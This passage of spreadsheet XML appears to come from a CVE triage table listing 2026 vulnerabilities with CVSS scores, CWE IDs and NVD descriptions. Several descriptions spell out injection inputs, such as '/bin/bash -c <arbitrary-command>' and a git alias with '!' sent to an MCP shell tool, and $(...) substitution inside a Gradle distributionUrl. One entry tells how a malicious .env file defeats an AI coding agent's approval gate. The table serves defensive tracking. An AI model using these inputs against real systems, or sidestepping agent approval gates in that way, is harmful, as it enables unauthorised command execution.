      <c r="G1602" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1602" s="5" t="inlineStr"/>
      <c r="I1602" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1602" s="5" t="inlineStr"/>
      <c r="K1602" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="L1602" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="C1603" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1603" s="5" t="inlineStr"/>
      <c r="F1603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1603" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1603" s="5" t="inlineStr"/>
      <c r="I1603" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1603" s="5" t="inlineStr"/>
      <c r="K1603" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1603" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57159</t>
        </is>
      </c>
      <c r="C1604" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1604" s="5" t="inlineStr"/>
      <c r="F1604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1604" s="5" t="inlineStr"/>
      <c r="H1604" s="5" t="inlineStr"/>
      <c r="I1604" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1604" s="5" t="inlineStr"/>
      <c r="K1604" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L1604" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 673b978, a remote out-of-bounds read and write can occur in the SDP negotiator when the remote payload-type map maintenance feature is enabled. assign_pt_and_update_map() in pjmedia/src/pjmedia/sdp_neg.c uses payload-type numbers taken from a remote SDP offer or answer to index fixed-size internal tables without sufficient bounds validation, so a crafted remote SDP can cause memory access outside those tables. The practical impact is memory corruption and denial of service; code execution is not demonstrated. This path is only reached when PJMEDIA_SDP_NEG_MAINTAIN_REMOTE_PT_MAP is enabled. The default is disabled, so default builds are not affected; the feature is an interoperability option that integrating products may enable. This issue has been patched via commit 673b978.</t>
        </is>
      </c>
      <c r="M1604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57159</t>
        </is>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57432</t>
        </is>
      </c>
      <c r="C1605" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1605" s="5" t="inlineStr"/>
      <c r="F1605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1605" s="5" t="inlineStr"/>
      <c r="H1605" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I1605" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J1605" s="5" t="inlineStr"/>
      <c r="K1605" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L1605" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.11 have an integer overflow in S_measure_struct leading to an out-of-bounds heap read in pack and unpack.
S_measure_struct adds each item's size times its repeat count to a running total with no overflow check, so a large repeat count in a pack or unpack template wraps the signed SSize_t total negative. The @, X, and x position codes then guard their moves with a signed length comparison that passes when the length is negative, advancing the buffer pointer out of bounds.
A template derived from untrusted input can read heap memory past the buffer and return it to the caller.</t>
        </is>
      </c>
      <c r="M1605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57432</t>
        </is>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63388</t>
        </is>
      </c>
      <c r="C1606" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1606" s="5" t="inlineStr"/>
      <c r="F1606" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1606" s="5" t="inlineStr"/>
      <c r="H1606" s="5" t="inlineStr"/>
      <c r="I1606" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1606" s="5" t="inlineStr"/>
      <c r="K1606" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-787</t>
        </is>
      </c>
      <c r="L1606" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a heap out-of-bounds write in bufferevent_sock.c when bufferevent_socket_set_conn_address_ copies a kernel-supplied AF_UNIX peer address into bufferevent_private.conn_address. Release builds compiled with NDEBUG disable the EVUTIL_ASSERT length guard, and the evhttp accept path can pass a 110-byte sockaddr from accept() into the 28-byte field. An unauthenticated local peer able to connect to an AF_UNIX listener can overwrite the adjacent dns_request pointer and heap data, causing memory corruption with confidentiality, integrity, and availability impact. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63388</t>
        </is>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64657</t>
        </is>
      </c>
      <c r="C1607" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1607" s="5" t="inlineStr"/>
      <c r="F1607" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1607" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1607" s="5" t="inlineStr"/>
      <c r="I1607" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1607" s="5" t="inlineStr"/>
      <c r="K1607" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1607" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.19, the PostgreSQL datasource connector in packages/server/src/integrations/postgres.ts interpolates the user-controlled schema configuration field into a SET search_path statement without escaping embedded double quotes, allowing an authenticated administrator who saves or tests the datasource to execute arbitrary SQL through the simple query protocol. This issue is fixed in version 3.39.19.</t>
        </is>
      </c>
      <c r="M1607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64657</t>
        </is>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66065</t>
        </is>
      </c>
      <c r="C1608" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1608" s="5" t="inlineStr"/>
      <c r="F1608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1608" s="5" t="inlineStr"/>
      <c r="H1608" s="5" t="inlineStr"/>
      <c r="I1608" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1608" s="5" t="inlineStr"/>
      <c r="K1608" s="5" t="inlineStr">
        <is>
          <t>CWE-15, CWE-94</t>
        </is>
      </c>
      <c r="L1608" s="5" t="inlineStr">
        <is>
          <t>Ouroboros is a local-first runtime for AI coding agents that records their actions and applies user-defined policies to constrain behavior. Versions prior to 0.42.1 have an incomplete denylist. Several execution-routing keys of the same RCE class were omitted, so a malicious cloned repo can still reach arbitrary command execution by shipping a .env (auto-loaded at import, with no review step). The CVE-2026-47211 fix added _UNTRUSTED_ENV_DENYLIST to stop an untrusted project-directory .env from redirecting execution, but it did not account for all keys. The backend config-home and MCP/plugin roots bypass the approval gate by pointing the nested agent, MCP servers, and plugin roster at attacker config. Other variables re-enable blocked local transports, replace sub-agent prompts, switch backends, and lower tool approval classes, further weakening the approval gate. This issue has been fixed in version 0.42.1.</t>
        </is>
      </c>
      <c r="M1608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66065</t>
        </is>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67986</t>
        </is>
      </c>
      <c r="C1609" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1609" s="5" t="inlineStr"/>
      <c r="F1609" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1609" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1609" s="5" t="inlineStr"/>
      <c r="I1609" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1609" s="5" t="inlineStr"/>
      <c r="K1609" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1609" s="5" t="inlineStr">
        <is>
          <t>amazing-print/amazing_print at commit dc890dfafdf07088ea901df53c19c2710e5c5234 contains a Ruby code injection condition in AwesomeMethodArray#grep. A specially named method containing Ruby interpolation syntax can be interpolated into a dynamically constructed eval string when grep is called with a block, resulting in Ruby code execution in the host process. Exploitation requires an application path that allows an attacker to influence dynamic method names.</t>
        </is>
      </c>
      <c r="M1609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67986</t>
        </is>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="C1610" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1610" s="5" t="inlineStr"/>
      <c r="F1610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1610" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1610" s="5" t="inlineStr"/>
      <c r="I1610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1610" s="5" t="inlineStr"/>
      <c r="K1610" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1610" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="C1611" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1611" s="5" t="inlineStr"/>
      <c r="F1611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1611" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1611" s="5" t="inlineStr"/>
      <c r="I1611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1611" s="5" t="inlineStr"/>
      <c r="K1611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1611" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72734</t>
        </is>
      </c>
      <c r="C1612" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1612" s="5" t="inlineStr"/>
      <c r="F1612" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1612" s="5" t="inlineStr"/>
      <c r="H1612" s="5" t="inlineStr"/>
      <c r="I1612" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1612" s="5" t="inlineStr"/>
      <c r="K1612" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1612" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.28.7 until 0.29.13, the server.remove tRPC mutation in apps/dokploy/server/api/routers/server.ts accepts a caller-controlled serverId and calls haveActiveServices, findServerById, removeDeploymentsByServerId, and deleteServer without verifying that currentServer.organizationId equals ctx.session.activeOrganizationId. An authenticated owner or administrator with server:delete in one organization who previously observed another organization's serverId can delete that organization's server registration and deployment records, interrupt Dokploy management, and receive the associated plaintext SSH private key even though server.one denies the same cross-organization read. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72734</t>
        </is>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73076</t>
        </is>
      </c>
      <c r="C1613" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1613" s="5" t="inlineStr"/>
      <c r="F1613" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1613" s="5" t="inlineStr"/>
      <c r="H1613" s="5" t="inlineStr"/>
      <c r="I1613" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1613" s="5" t="inlineStr"/>
      <c r="K1613" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L1613" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0847, runtime/autoload/vimball.vim allows a crafted vimball member named .VimballRecord to overwrite the installation record with attacker-chosen commands. When vimball#RmVimball() later processes the matching record entry, the stored Ex commands, including operating-system commands invoked through :!, execute with the privileges of the user running Vim. This issue is fixed in version 9.2.0847.</t>
        </is>
      </c>
      <c r="M1613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73076</t>
        </is>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73077</t>
        </is>
      </c>
      <c r="C1614" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1614" s="5" t="inlineStr"/>
      <c r="F1614" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1614" s="5" t="inlineStr"/>
      <c r="H1614" s="5" t="inlineStr"/>
      <c r="I1614" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1614" s="5" t="inlineStr"/>
      <c r="K1614" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1614" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0839, the runtime/ftplugin/sh.vim, runtime/ftplugin/zsh.vim, and runtime/ftplugin/ps1.vim filetype plugins pass attacker-controlled Visual-mode selections from K through keywordprg commands without safely separating shell arguments. fnameescape() and PATH_ESC_CHARS do not neutralize shell metacharacters before ShKeywordPrg, ZshKeywordPrg, or GetHelp invokes bash, zsh, or PowerShell, allowing arbitrary operating-system commands to execute with the privileges of the user running Vim. This issue is fixed in version 9.2.0839.</t>
        </is>
      </c>
      <c r="M1614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73077</t>
        </is>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73629</t>
        </is>
      </c>
      <c r="C1615" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1615" s="5" t="inlineStr"/>
      <c r="F1615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1615" s="5" t="inlineStr"/>
      <c r="H1615" s="5" t="inlineStr"/>
      <c r="I1615" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1615" s="5" t="inlineStr"/>
      <c r="K1615" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1615" s="5" t="inlineStr">
        <is>
          <t>Serendipity before 2.6.0 contains a server-side request forgery vulnerability in the serendipity_url_allowed() filter that fails to block hex-encoded IPv4 addresses, IPv6 literals, and link-local ranges. Authenticated users with adminImagesAdd permission can bypass the filter using alternate address formats to request internal services and retrieve response bodies through the public uploads directory.</t>
        </is>
      </c>
      <c r="M1615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73629</t>
        </is>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75060</t>
        </is>
      </c>
      <c r="C1616" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1616" s="5" t="inlineStr"/>
      <c r="F1616" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1616" s="5" t="inlineStr"/>
      <c r="H1616" s="5" t="inlineStr">
        <is>
          <t>jetbrains:pycharm</t>
        </is>
      </c>
      <c r="I1616" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1616" s="5" t="inlineStr"/>
      <c r="K1616" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1616" s="5" t="inlineStr">
        <is>
          <t>In JetBrains PyCharm before 2026.2.1 code execution was possible via unauthenticated Jupyter MCP tools</t>
        </is>
      </c>
      <c r="M1616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75060</t>
        </is>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75855</t>
        </is>
      </c>
      <c r="C1617" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1617" s="5" t="inlineStr"/>
      <c r="F1617" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1617" s="5" t="inlineStr"/>
      <c r="H1617" s="5" t="inlineStr"/>
      <c r="I1617" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1617" s="5" t="inlineStr"/>
      <c r="K1617" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1617" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 fail to sanitize database names in the POST /api/v1/server endpoint's create database and drop database commands, allowing authenticated root users to write and delete arbitrary files outside the configured database directory. Attackers can supply database names containing ../ sequences to create databases at arbitrary filesystem paths or recursively delete directories the server process can access.</t>
        </is>
      </c>
      <c r="M1617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75855</t>
        </is>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75999</t>
        </is>
      </c>
      <c r="C1618" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1618" s="5" t="inlineStr"/>
      <c r="F1618" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1618" s="5" t="inlineStr"/>
      <c r="H1618" s="5" t="inlineStr"/>
      <c r="I1618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1618" s="5" t="inlineStr"/>
      <c r="K1618" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1618" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t>
        </is>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76228</t>
        </is>
      </c>
      <c r="C1619" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1619" s="5" t="inlineStr"/>
      <c r="F1619" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1619" s="5" t="inlineStr"/>
      <c r="H1619" s="5" t="inlineStr"/>
      <c r="I1619" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1619" s="5" t="inlineStr"/>
      <c r="K1619" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1619" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=32.124.0 and before 42.68.5 (and Mend renovate-ce/renovate-ee before 13.3.0) contain a command injection vulnerability in Gradle Wrapper artifact handling. When Renovate processes Gradle Wrapper updates, it invokes a wrapper update command via a shell (e.g. /bin/sh -c ... ./gradlew :wrapper --gradle-distribution-url &lt;value&gt;). If an attacker supplies a malicious gradle-wrapper.properties whose distributionUrl contains shell command substitution syntax such as $(...), the shell evaluates it before Gradle parses the URL, resulting in arbitrary command execution in the Renovate runtime. Exploitation requires the attacker to introduce the malicious file into a repository that Renovate scans; the issue occurs even when allowScripts is disabled.</t>
        </is>
      </c>
      <c r="M1619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76228</t>
        </is>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76229</t>
        </is>
      </c>
      <c r="C1620" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1620" s="5" t="inlineStr"/>
      <c r="F1620" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1620" s="5" t="inlineStr"/>
      <c r="H1620" s="5" t="inlineStr"/>
      <c r="I1620" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1620" s="5" t="inlineStr"/>
      <c r="K1620" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1620" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.218.0 before 40.33.0 contain an arbitrary command injection vulnerability in the kustomize manager where user-provided chart names are appended to helm pull commands without proper sanitization. Attackers with repository write access can craft malicious kustomization.yaml files with specially crafted chart names to execute arbitrary commands on the Renovate host machine.</t>
        </is>
      </c>
      <c r="M1620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76229</t>
        </is>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76230</t>
        </is>
      </c>
      <c r="C1621" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1621" s="5" t="inlineStr"/>
      <c r="F1621" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1621" s="5" t="inlineStr"/>
      <c r="H1621" s="5" t="inlineStr"/>
      <c r="I1621" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1621" s="5" t="inlineStr"/>
      <c r="K1621" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1621" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 35.63.0 before 40.33.0 contain a command injection vulnerability in the npm manager where user-provided packageName values are appended to npm install commands without proper sanitization. Attackers with repository write access can craft malicious Renovate configuration files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76230</t>
        </is>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76231</t>
        </is>
      </c>
      <c r="C1622" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1622" s="5" t="inlineStr"/>
      <c r="F1622" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1622" s="5" t="inlineStr"/>
      <c r="H1622" s="5" t="inlineStr"/>
      <c r="I1622" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1622" s="5" t="inlineStr"/>
